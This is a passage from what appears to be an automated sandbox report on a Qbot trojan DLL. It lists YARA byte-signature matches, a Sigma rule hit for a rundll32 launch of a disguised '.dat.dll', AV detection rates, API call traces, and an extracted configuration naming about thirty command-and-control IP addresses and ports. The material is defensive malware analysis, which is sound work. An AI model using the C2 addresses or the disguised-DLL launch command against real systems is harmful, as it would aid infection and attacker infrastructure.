9.0.wermgr.exe.2bc0000.0.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
8.2.wermgr.exe.2580000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
8.2.wermgr.exe.2580000.0.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
8.2.wermgr.exe.2580000.0.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
7.0.wermgr.exe.2520000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
7.0.wermgr.exe.2520000.0.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
7.0.wermgr.exe.2520000.0.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
4.3.rundll32.exe.4960000.6.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
4.3.rundll32.exe.4960000.6.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0xf74f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
4.3.rundll32.exe.4960000.6.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1aa14:$a4: %u;%u;%u; 0x1af50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1add8:$a6: %u&%s&%u 0x74c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x7804:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x1b30:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x1587:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xb0ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
8.0.wermgr.exe.2580000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
8.0.wermgr.exe.2580000.0.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
8.0.wermgr.exe.2580000.0.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
7.2.wermgr.exe.2520000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
7.2.wermgr.exe.2520000.0.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
7.2.wermgr.exe.2520000.0.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
5.2.rundll32.exe.4ad0000.1.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
5.2.rundll32.exe.4ad0000.1.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
5.2.rundll32.exe.4ad0000.1.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
3.2.regsvr32.exe.2bc0000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
3.2.regsvr32.exe.2bc0000.0.raw.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
3.2.regsvr32.exe.2bc0000.0.raw.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
7.2.wermgr.exe.2520000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
7.2.wermgr.exe.2520000.0.raw.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
7.2.wermgr.exe.2520000.0.raw.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
5.3.rundll32.exe.3000000.1.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
5.3.rundll32.exe.3000000.1.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0xf74f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
5.3.rundll32.exe.3000000.1.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1aa14:$a4: %u;%u;%u; 0x1af50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1add8:$a6: %u&%s&%u 0x74c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x7804:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x1b30:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x1587:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xb0ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
4.2.rundll32.exe.4af0000.1.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
4.2.rundll32.exe.4af0000.1.raw.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
4.2.rundll32.exe.4af0000.1.raw.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
4.3.rundll32.exe.4960000.6.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
4.3.rundll32.exe.4960000.6.raw.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
4.3.rundll32.exe.4960000.6.raw.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
3.3.regsvr32.exe.2b70000.2.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
3.3.regsvr32.exe.2b70000.2.raw.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
3.3.regsvr32.exe.2b70000.2.raw.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
3.2.regsvr32.exe.2bc0000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
3.2.regsvr32.exe.2bc0000.0.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
3.2.regsvr32.exe.2bc0000.0.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
8.0.wermgr.exe.2580000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
8.0.wermgr.exe.2580000.0.raw.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
8.0.wermgr.exe.2580000.0.raw.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
5.2.rundll32.exe.4ad0000.1.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
5.2.rundll32.exe.4ad0000.1.raw.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
5.2.rundll32.exe.4ad0000.1.raw.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
Click to see the 61 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Execute DLL with spoofed extension

Source: Process started

Author: Joe Security: Data: Command: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1, CommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 1540, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1, ProcessId: 5832, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: diatomaceous.dat.dll	ReversingLabs: Detection: 73%
Source: diatomaceous.dat.dll	Virustotal: Detection: 77%	Perma Link
Source: diatomaceous.dat.dll	Metadefender: Detection: 44%	Perma Link

Machine Learning detection for sample

Source: diatomaceous.dat.dll

Joe Sandbox ML: detected

Source: 5.3.rundll32.exe.3000000.1.raw.unpack

Malware Configuration Extractor: Qbot {"Bot id": "BB", "Campaign": "1664535088", "Version": "403.902", "C2 list": ["41.107.71.201:443", "105.101.230.16:443", "105.108.239.60:443", "196.64.227.5:8443", "41.249.158.221:995", "134.35.14.5:443", "113.170.117.251:443", "187.193.219.248:443", "122.166.244.116:443", "154.237.129.123:995", "41.98.229.81:443", "186.48.199.243:995", "102.156.3.13:443", "41.97.190.189:443", "197.207.191.164:443", "105.184.14.132:995", "196.207.146.151:443", "105.158.113.15:443", "196.89.42.89:995", "86.98.156.229:993", "177.174.119.195:32101", "81.156.194.147:2078", "80.253.189.55:443", "197.49.175.67:995", "177.45.78.52:993", "89.187.169.77:443", "196.92.59.242:995", "41.13.200.19:443", "41.97.195.237:443", "92.191.56.11:2222", "154.70.53.202:443", "210.186.37.98:50002"]}

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DA52E60 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,CryptReleaseContext,std::ios_base::_Ios_base_dtor,Concurrency::cancel_current_task,std::ios_base::_Ios_base_dtor,

0_2_6DA52E60

Source: diatomaceous.dat.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: diatomaceous.dat.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: y'E:\cpp\out\out\desktop.pdb source: loaddll32.exe, 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.330297730.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.330600299.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.330624876.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, diatomaceous.dat.dll
Source:	Binary string: E:\cpp\out\out\desktop.pdb source: loaddll32.exe, 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.330297730.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.330600299.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.330624876.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, diatomaceous.dat.dll
Source:	Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.331023524.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.331444985.0000000004401000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.330918332.00000000049C1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: rundll32.exe, 00000004.00000002.330081767.000000000319A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.317581182.00000000031D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.317520093.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.317597615.00000000031DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000004.00000002.330081767.000000000319A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.317581182.00000000031D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.317520093.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.317597615.00000000031DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.331023524.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.331444985.0000000004401000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.330918332.00000000049C1000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA694B5 FindFirstFileExW,		0_2_6DA694B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BCC123 FindFirstFileW,FindNextFileW,		3_2_02BCC123

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_02BC5D1E GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,GetCursorInfo,CopyIcon,GetIconInfo,GetObjectW,DrawIconEx,SelectObject,GetObjectW,GetDIBits,DeleteDC,DeleteDC,DeleteObject,

3_2_02BC5D1E

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.rundll32.exe.4af0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 4.2.rundll32.exe.4af0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 3.3.regsvr32.exe.2b70000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 3.3.regsvr32.exe.2b70000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 9.0.wermgr.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 9.0.wermgr.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 8.2.wermgr.exe.2580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 8.2.wermgr.exe.2580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 7.0.wermgr.exe.2520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 7.0.wermgr.exe.2520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 5.3.rundll32.exe.3000000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 5.3.rundll32.exe.3000000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
